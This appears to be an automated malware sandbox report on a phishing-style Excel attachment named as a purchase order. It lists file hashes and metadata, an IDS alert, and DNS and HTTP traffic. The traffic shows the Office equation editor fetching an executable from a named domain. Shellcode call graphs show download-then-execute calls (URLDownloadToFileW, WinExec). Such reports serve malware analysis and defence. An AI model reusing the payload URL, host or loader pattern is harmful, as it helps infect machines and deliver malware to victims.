              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              File type:Microsoft Excel 2007+
              Entropy (8bit):7.982376608971824
              TrID:
              • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
              • ZIP compressed archive (8000/1) 18.60%
              File name:PO-008847332.xlam.xlsx
              File size:797'580 bytes
              MD5:1ceb0704ce7180d31e51d1b19577f8fd
              SHA1:2b36a1718e467f7c651b0f6988c2c00bb2cf510d
              SHA256:87c11e91ae0ec1d31aba83c2e3f3a70a8bccfc731be2be1fe4aaa91681825acd
              SHA512:7443f2a334f5e47b6c9bcd9a2a34cd941d4c0e71d700e10c3fb5b0f126bd3b64b1d34aee0a979a9d97a799ae47ae8ba91968c187c1c6e4b1c72336c6e5e0367c
              SSDEEP:12288:5aF6ZLle9emStTf/lO3Hux7X1qR3RTL77MibFmK8EbbmgHiy1x4OfwI0R:QUOemQw3O9X1ql5L7Ix0mgHiyLS3R
              TLSH:310502647846C9B577EE51F90C44B90223E32448B82F30556FD77B4627A80A9CB26FEF
              File Content Preview:PK........&.VY_.."............[Content_Types].xmlUT....,.g.,.g.,.g..Ok.1....|.E....C......J..I...4.*.?..c........u./.,..{.7#..7.Uk.............e#~<~..EU.....6b.E\^.}.=n.....4.#J_.*.C.E...W.1{ ..K.@.`...d.Y......3..l....`u....g..q.....T2OTW;a...H.Y..;W.`.q
              Icon Hash:2562ab89a7b7bfbf
              Document Type:OpenXML
              Number of OLE Files:1
              Has Summary Info:
              Application Name:
              Encrypted Document:False
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:False
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:False
              Author:Jose Suarez
              Last Saved By:HP
              Create Time:2024-09-30T12:55:35Z
              Last Saved Time:2024-10-01T18:04:35Z
              Creating Application:Microsoft Excel
              Security:0
              Thumbnail Scaling Desired:false
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:12.0000
              General
              Stream Path:\x1olE10NATIvE
              CLSID:
              File Type:data
              Stream Size:1029458
              Entropy:5.885282614362565
              Base64 Encoded:False
              Data ASCII:. 5 . . : B . . g 9 . . . 6 . 7 6 . . . Q . g H c o + f R F . . D . ( o . . - . < r . . : . M b 1 V . O . . . . . . ^ 6 . w , Z 1 e . . o + . } . J Y . W % * $ . - . 1 8 . = 8 / % a 1 [ \\ Y . ; . ( . \\ / z U k e . 9 . . D } @ C u . P " . . = i q . ~ V ' j . : $ . . @ u . i J . = . . . b . + 5 f k u x " . v ) ! . . B . . " g u . z ! M . [ ~ . b S ^ R . P ' . . . F . . . . . q . . % * M T [ . S { S . h . - + n @ . ; O 4 . a 3 5 . 8 . G P 3 0 s . < " r p [ Y ^ - . W I O n 5 9 . ) . . M . ! X V X O l . .
              Data Raw:1f 35 e3 03 03 3a 42 9a 93 df 01 08 67 39 be e9 c6 0e a0 81 ee ad 09 c9 9f 8b 36 8b 0e be 37 36 d2 aa 81 ee 87 ce 8b aa 8b 1e 51 ff d3 83 c0 67 ff e0 48 63 6f 2b 66 52 cb 46 06 08 44 00 28 6f 1c 82 1d e0 2d a8 e6 01 3c 72 ef ef b8 eb 0b 8a ad 17 ba ff cf e7 3a 0d 90 b7 4d e1 62 31 56 7f d6 4f d7 bd be 09 ac a1 df b5 ad e9 dc 01 00 00 d7 5e 9e f1 36 02 af 77 2c cd d9 5a a6 31 65 05
              General
              Stream Path:dYtF
              CLSID:
              File Type:empty
              Stream Size:0
              Entropy:0.0
              Base64 Encoded:False
              Data ASCII:
              Data Raw:
              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-10-24T08:49:36.098228+02002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.2249161104.21.53.11280TCP
              TimestampSource PortDest PortSource IPDest IP
              Oct 24, 2024 08:49:35.417788982 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:35.423345089 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:35.423451900 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:35.423719883 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:35.429079056 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.098078012 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.098227978 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.098848104 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.104218006 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.305821896 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.305917025 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.312875986 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.312958956 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.313147068 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.313214064 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.313239098 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.313275099 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.313282967 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.313314915 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.313380957 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.313421011 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.313807011 CEST8049161104.21.53.112192.168.2.22
              Oct 24, 2024 08:49:36.313849926 CEST4916180192.168.2.22104.21.53.112
              Oct 24, 2024 08:49:36.673855066 CEST4916180192.168.2.22104.21.53.112
              TimestampSource PortDest PortSource IPDest IP
              Oct 24, 2024 08:49:35.386730909 CEST5456253192.168.2.228.8.8.8
              Oct 24, 2024 08:49:35.401662111 CEST53545628.8.8.8192.168.2.22
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 24, 2024 08:49:35.386730909 CEST192.168.2.228.8.8.80x5694Standard query (0)eficienciaeningenieria.com.mxA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 24, 2024 08:49:35.401662111 CEST8.8.8.8192.168.2.220x5694No error (0)eficienciaeningenieria.com.mx104.21.53.112A (IP address)IN (0x0001)false
              Oct 24, 2024 08:49:35.401662111 CEST8.8.8.8192.168.2.220x5694No error (0)eficienciaeningenieria.com.mx172.67.212.58A (IP address)IN (0x0001)false
              • eficienciaeningenieria.com.mx
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.2249161104.21.53.112803576C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              TimestampBytes transferredDirectionData
              Oct 24, 2024 08:49:35.423719883 CEST333OUTGET /kdeplu/ngoct2.exe HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: eficienciaeningenieria.com.mx
              Connection: Keep-Alive
              Oct 24, 2024 08:49:36.098078012 CEST1141INHTTP/1.1 302 Found
              Date: Thu, 24 Oct 2024 06:49:36 GMT
              Content-Type: text/html; charset=iso-8859-1
              Transfer-Encoding: chunked
              Connection: keep-alive
              Location: http://eficienciaeningenieria.com.mx/cgi-sys/suspendedpage.cgi
              CF-Cache-Status: BYPASS
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJUwmu0NQ5tYFuzD7AQvWqHA4yoK2efz3kqDlx%2FzFHM9iitUS03gk0lO6M3cCCUBJWWX%2FaZpeK7OeUXNQyVtfSe9L6ZqBVAI8XbX97B2Y%2BLzlOyVUqM6yPSh%2FLZPU0Zoqp48XWfkgwcNkitB814X0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Vary: Accept-Encoding
              Server: cloudflare
              CF-RAY: 8d78071fbb0e2cc7-DFW
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=333&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 66 69 63 69 65 6e 63 69 61 65 6e 69 6e 67 65 6e 69 65 72 69 61 2e 63 6f 6d 2e 6d 78 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
              Data Ascii: f6<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://eficienciaeningenieria.com.mx/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>0
              Oct 24, 2024 08:49:36.098848104 CEST341OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: eficienciaeningenieria.com.mx
              Connection: Keep-Alive
              Oct 24, 2024 08:49:36.305821896 CEST843INHTTP/1.1 200 OK
              Date: Thu, 24 Oct 2024 06:49:36 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              Vary: Accept-Encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlwFMZDAUUP1q8fGkJlafdLmvFvppeHCxJUyHsBRn6E2OZElUVjUSTKYdHvzQPSIVobzf%2BieZdkvz4sQo1KSdr7tG%2FMS08HxvHHoZgScyc4OHSbL%2F39xmAZg%2FVz0UZCJuyv4a%2BWyGz4GA5HAKPmq7w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8d7807210c1a2cc7-DFW
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1179&sent=4&recv=6&lost=0&retrans=0&sent_bytes=1141&recv_bytes=674&delivery_rate=2280314&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
              Data Ascii: f
              Oct 24, 2024 08:49:36.312875986 CEST578INData Raw: 32 33 62 0d 0a ac 54 4b 6f db 30 0c be ef 57 70 1e 76 8b 6c e7 d1 ad 75 e3 02 41 d7 61 b7 15 d8 2e 3b 32 32 1d 0b 91 25 4f a2 f3 d8 b0 ff 3e 28 49 5b db 4d b1 0d 18 2f 16 f9 91 1f 29 92 d6 fc f5 87 cf b7 5f bf dd df 41 c5 b5 be 79 35 3f 7e 00 00
              Data Ascii: 23bTKo0WpvluAa.;22%O>(I[M/)_Ay5?~aq:s#{6ytka"G-vk:O\E+d^w_"vr;!i`MyQmV\m$qPFbZxqkj=`zH5,aLA<9G'<+"
              Oct 24, 2024 08:49:36.313147068 CEST1236INData Raw: 65 32 66 0d 0a cc 59 57 b3 db c8 d1 fd 2b b7 e4 17 bb 60 2d 72 5a 6b b7 8c 0c 10 81 c8 81 6f c8 00 11 89 4c 56 f9 bf bb 78 25 d9 d2 95 b4 f2 67 bf 7c f3 42 cc a0 a7 a7 e7 4c 9f 41 b1 cf 57 5c 42 be 9a ff b3 bc fc 8c 3b f7 da be bb ee c7 05 df 3f
              Data Ascii: e2fYW+`-rZkoLVx%g|BLAW\B;?4q`_]-_]]Y>iuVO?zK?zs?W7wyV/~ j<Oa~v},o-`re|?0R'}G
              Oct 24, 2024 08:49:36.313239098 CEST1236INData Raw: 5e 1e c5 bd 38 5a 27 9d f5 78 45 3c 76 38 ad 4e 35 cb 0c 5d f3 40 0f 0c 6d 81 7e 0d a4 2e a8 1a 6b 86 62 22 22 23 d9 cf 49 12 e9 e0 e5 d2 7a ac 50 a9 0a dd 10 fd aa 09 54 f2 50 7d 47 e0 04 39 e7 2e ce 7d 9e 20 ec 76 92 7a f7 31 fb c7 69 b0 f6 8e
              Data Ascii: ^8Z'xE<v8N5]@m~.kb""#IzPTP}G9.} vz1iL"GdIcIlp4\M%$&44]m;FVZVB58*ea3el!c9}Sbi(Vk5f8f]O.RR;IJ&
              Oct 24, 2024 08:49:36.313275099 CEST424INData Raw: 0b 07 ec 2b 9b a4 60 01 c7 0c 62 c1 ce 79 70 58 c7 da f4 e5 7a 82 1d 0a 63 6c 1b b3 77 e6 b6 74 31 27 5e 7a bb d6 90 36 d1 01 39 66 38 bc 1f 6f 80 b2 8b 00 51 55 05 1b 3c 0c a3 0d 88 1b 37 49 a1 7d 7f c4 d0 dd 38 67 b0 00 17 73 e4 71 a4 e7 23 a7
              Data Ascii: +`bypXzclwt1'^z69f8oQU<7I}8gsq#a${;<F2rW3`;W3t#S?m*7N1H<_(39w~E)/)ijfL?ghAcQw2WA4jDX+l.n!YuiW=`\>vmjkv;"e
              Oct 24, 2024 08:49:36.313380957 CEST742INData Raw: 61 c2 75 b8 73 71 19 47 bd 96 78 a2 f6 6f 13 42 c2 83 3f 34 1e c1 9c 68 0f 17 a5 3e 54 f6 1d ef 64 a0 d1 84 ea 50 e0 b4 45 20 8b 93 38 b7 b4 75 06 44 01 11 69 ed 30 5c 1e 61 e5 d9 a6 eb 2e b4 64 31 44 05 64 20 9c 09 38 d3 d3 92 2d e3 03 de ed 4a
              Data Ascii: ausqGxoB?4h>TdPE 8uDi0\a.d1Dd 8-J[5~% 6!U0+0;jfVgM5 -E:3ai@g[aFfE~eV(A9kd07"R-!LamI69.Ic4*LUPnNO^%
              Oct 24, 2024 08:49:36.313807011 CEST21INData Raw: 62 0d 0a e3 02 00 32 07 92 96 8e 1e 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: b20


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:02:48:44
              Start date:24/10/2024
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Imagebase:0x13f5d0000
              File size:28'253'536 bytes
              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Target ID:2
              Start time:02:49:33
              Start date:24/10/2024
              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Wow64 process (32bit):true
              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Imagebase:0x400000
              File size:543'304 bytes
              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:17.6%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:81.5%
                Total number of Nodes:54
                Total number of Limit Nodes:2
                execution_graph 283 3570710 GetPEB 284 357071e 283->284 285 35705f0 286 35705f2 285->286 289 3570605 LoadLibraryW 286->289 300 357061f 289->300 291 357060c 292 3570630 URLDownloadToFileW 291->292 314 357069e URLDownloadToFileW 291->314 310 35706bb 292->310 301 3570622 300->301 302 357069e 4 API calls 301->302 303 3570630 URLDownloadToFileW 302->303 305 35706bb 3 API calls 303->305 306 35706a7 305->306 307 357071e 306->307 320 35706e9 306->320 307->291 311 35706be 310->311 312 35706e9 3 API calls 311->312 313 35706e1 312->313 315 35706bb 3 API calls 314->315 316 35706a7 314->316 315->316 317 357071e 316->317 318 35706e9 3 API calls 316->318 317->292 319 35706e1 318->319 321 35706ec WinExec 320->321 326 3570709 321->326 323 35706fd 324 35706e1 323->324 325 357070c ExitProcess 323->325 327 357070c ExitProcess 326->327 328 357055a ExitProcess 345 3570573 328->345 330 3570566 361 357058f 330->361 346 3570579 345->346 347 3570580 346->347 348 357058f 8 API calls 346->348 349 35705c8 347->349 350 357060f 347->350 353 35705b0 347->353 348->347 351 357069e 4 API calls 350->351 352 3570630 URLDownloadToFileW 350->352 351->352 355 35706bb 3 API calls 352->355 356 35705f0 7 API calls 353->356 357 35706a7 355->357 356->349 358 357071e 357->358 359 35706e9 3 API calls 357->359 358->330 360 35706e1 359->360 362 3570595 361->362 381 35705b6 362->381 382 35705b9 381->382 383 35705f0 7 API calls 382->383 384 35705c8 383->384

                Callgraph

                • Executed
                • Not Executed
                • Opacity -> Relevance
                • Disassembly available
                callgraph 0 Function_03570710 17 Function_03570738 0->17 1 Function_0357061F 2 Function_0357069E 1->2 15 Function_035706BB 1->15 1->17 24 Function_035706E9 1->24 2->15 2->17 2->24 3 Function_0357055A 3->2 7 Function_0357058F 3->7 13 Function_03570573 3->13 14 Function_035705F0 3->14 3->15 3->17 3->24 4 Function_03570119 5 Function_03570605 5->1 5->2 5->15 5->17 5->24 6 Function_03570000 7->2 10 Function_03570789 7->10 12 Function_035705B6 7->12 7->14 7->15 7->17 7->24 8 Function_0357004E 9 Function_0357038C 11 Function_03570709 12->14 13->2 13->7 13->10 13->14 13->15 13->17 13->24 14->5 15->24 16 Function_03570439 18 Function_035704E3 19 Function_035701A3 20 Function_03570122 21 Function_0357046E 22 Function_035700EA 23 Function_0357006A 24->11

                Control-flow Graph

                APIs
                • LoadLibraryW.KERNEL32(035705F7), ref: 03570605
                  • Part of subcall function 0357061F: URLDownloadToFileW.URLMON(00000000,03570630,?,00000000,00000000), ref: 035706A0
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFileLibraryLoad
                • String ID:
                • API String ID: 2776762486-0
                • Opcode ID: b8102050277b2b2410d0ee86ea7d4f4ac66c008c822256031ba6865c9c4246de
                • Instruction ID: a055521580ce79fe46c6f489943c059434c20e93da657012d352112cfb461e74
                • Opcode Fuzzy Hash: b8102050277b2b2410d0ee86ea7d4f4ac66c008c822256031ba6865c9c4246de
                • Instruction Fuzzy Hash: 69318F6500C3C52FD722D7706D7AB95BFA57B93200F19CA8E95810F0F3E3A4A201C7A6

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 27 35706e9-3570700 WinExec call 3570709 32 3570752 27->32 33 3570702 27->33 34 3570754-3570758 32->34 35 357075a-357075e 32->35 36 3570704-357070e ExitProcess 33->36 37 3570773-3570775 33->37 34->35 38 3570766-357076d 34->38 35->37 39 3570760-3570764 35->39 41 3570785-3570786 37->41 42 3570771 38->42 43 357076f 38->43 39->37 39->38 42->37 45 3570777-3570780 42->45 43->37 47 3570782 45->47 48 3570749-357074c 45->48 47->41 48->45 49 357074e 48->49 49->32
                APIs
                • WinExec.KERNEL32(?,00000001), ref: 035706F6
                  • Part of subcall function 03570709: ExitProcess.KERNELBASE(00000000), ref: 0357070E
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: ExecExitProcess
                • String ID:
                • API String ID: 4112423671-0
                • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                • Instruction ID: 7e4db2f593245feeeb8c7fbf7ede527348a7abcbb4c573f4c8c96e4e695685f5
                • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                • Instruction Fuzzy Hash: C5F0289990424369CB30F678B8597FAABD4FB81350FCC9D539882070F5E168D1C38E5D

                Control-flow Graph

                APIs
                • URLDownloadToFileW.URLMON(00000000,03570630,?,00000000,00000000), ref: 035706A0
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFile
                • String ID:
                • API String ID: 1407266417-0
                • Opcode ID: ec11eebfa41f37bd9f42ff56425e6a8030006d3ca0c67dd3da34e9ec8de1a80d
                • Instruction ID: 38f15fb89452312692ad613bfa94fe2d2548404308bf7e002c582072919d627b
                • Opcode Fuzzy Hash: ec11eebfa41f37bd9f42ff56425e6a8030006d3ca0c67dd3da34e9ec8de1a80d
                • Instruction Fuzzy Hash: A241ACA544C3C56FD722D730BD6AA95BFA47B83200F1DC68F95854F0F3E3A4A6068396

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 95 357058f-357059d call 3570789 call 35705b6 100 357060f-3570611 95->100 101 357059f-35705a4 95->101 103 3570613-357061a 100->103 104 3570681 100->104 101->100 102 35705a6-35705ae 101->102 106 3570622-3570680 call 357069e 102->106 112 35705b0-3570603 call 35705f0 102->112 103->106 107 3570682-35706b2 URLDownloadToFileW call 35706bb 104->107 106->107 118 35706b4 107->118 119 3570720-3570728 call 3570738 107->119 121 35706b6-35706b7 118->121 122 357071f 118->122 126 357072d-357072f 119->126 121->126 127 35706b9-35706e2 call 35706e9 121->127 122->119 129 3570731-3570735 126->129 130 357071e 126->130 130->119
                APIs
                • URLDownloadToFileW.URLMON(00000000,03570630,?,00000000,00000000), ref: 035706A0
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFile
                • String ID:
                • API String ID: 1407266417-0
                • Opcode ID: ef0c9cb7fd329f3ffb72877f5d8d939910985e20038acacacd6b76bc162734a7
                • Instruction ID: 3856f3aaf4b4eb572b281646cf1eb239eb575d284e57b62008cf039b33a68b13
                • Opcode Fuzzy Hash: ef0c9cb7fd329f3ffb72877f5d8d939910985e20038acacacd6b76bc162734a7
                • Instruction Fuzzy Hash: 73418CA504C3C56FD722D7307D7AB85BFA47B83200F0DCA8EA5854F1E3E3A4A6058796

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 136 357061f-35706b2 call 357069e URLDownloadToFileW call 35706bb 146 35706b4 136->146 147 3570720-3570728 call 3570738 136->147 148 35706b6-35706b7 146->148 149 357071f 146->149 151 357072d-357072f 147->151 148->151 152 35706b9-35706e2 call 35706e9 148->152 149->147 153 3570731-3570735 151->153 154 357071e 151->154 154->147
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFile
                • String ID:
                • API String ID: 1407266417-0
                • Opcode ID: 50c043f4b85db0da0fff6bc125625c1d1f5871cb16c937188c72beb59420b7c0
                • Instruction ID: 77a3093380f90ac5e21e86e3f4d9ac7d51d47a8e4064de45809b000ef756e4e0
                • Opcode Fuzzy Hash: 50c043f4b85db0da0fff6bc125625c1d1f5871cb16c937188c72beb59420b7c0
                • Instruction Fuzzy Hash: 6E217F6540C3C52FD722DB70AD6AB95BFB57B82600F19CACF95850F0E2E3A49501C7A6

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 158 357069e-35706a0 URLDownloadToFileW 159 35706a7-35706b2 158->159 160 35706a2 call 35706bb 158->160 161 35706b4 159->161 162 3570720-3570728 call 3570738 159->162 160->159 163 35706b6-35706b7 161->163 164 357071f 161->164 166 357072d-357072f 162->166 163->166 167 35706b9-35706e2 call 35706e9 163->167 164->162 168 3570731-3570735 166->168 169 357071e 166->169 169->162
                APIs
                • URLDownloadToFileW.URLMON(00000000,03570630,?,00000000,00000000), ref: 035706A0
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: DownloadFile
                • String ID:
                • API String ID: 1407266417-0
                • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                • Instruction ID: e2e7af801df70b418362ea09eb1c9d02276cd5ab47bc3d7d4da125dc4512daf4
                • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                • Instruction Fuzzy Hash: 281148355043423ADB20E664B855FEAF7E1BBC2750F58C556E5504B0F5E2A0E482CA69

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 173 3570709-357070e ExitProcess
                APIs
                • ExitProcess.KERNELBASE(00000000), ref: 0357070E
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                • Instruction Fuzzy Hash:

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 175 3570710-357071b GetPEB 176 357071e-357072f call 3570738 175->176 180 3570731-3570735 176->180
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                • Instruction ID: 1f9c04e14ccda802fc082ce372414e5333afc780695061b819d8ea58316ff1e9
                • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                • Instruction Fuzzy Hash: 4ED05E352115428FD344DB04E940E52F3BAFFC4211B18C268D0004B669C330E891CA90

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 181 357055a-3570589 ExitProcess call 3570573 call 357058f 188 35705f1-3570603 181->188 189 357058c-357059d 181->189 192 357060f-3570611 189->192 193 357059f-35705a4 189->193 195 3570613-357061a 192->195 196 3570681 192->196 193->192 194 35705a6-35705ae 193->194 198 3570622-3570680 call 357069e 194->198 204 35705b0-35705ef call 35705f0 194->204 195->198 199 3570682-35706b2 URLDownloadToFileW call 35706bb 196->199 198->199 210 35706b4 199->210 211 3570720-3570728 call 3570738 199->211 204->188 213 35706b6-35706b7 210->213 214 357071f 210->214 218 357072d-357072f 211->218 213->218 219 35706b9-35706e2 call 35706e9 213->219 214->211 221 3570731-3570735 218->221 222 357071e 218->222 222->211
                APIs
                • ExitProcess.KERNELBASE(03570548), ref: 0357055A
                Memory Dump Source
                • Source File: 00000002.00000002.468085162.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 6e2a16de336dd3fb816dc3201cb09af3330261794a73ae6407fe156a76576772
                • Instruction ID: 64a14dce92418d87284c9a89b922ab8f712233a55c7cde70b5429857c084228a
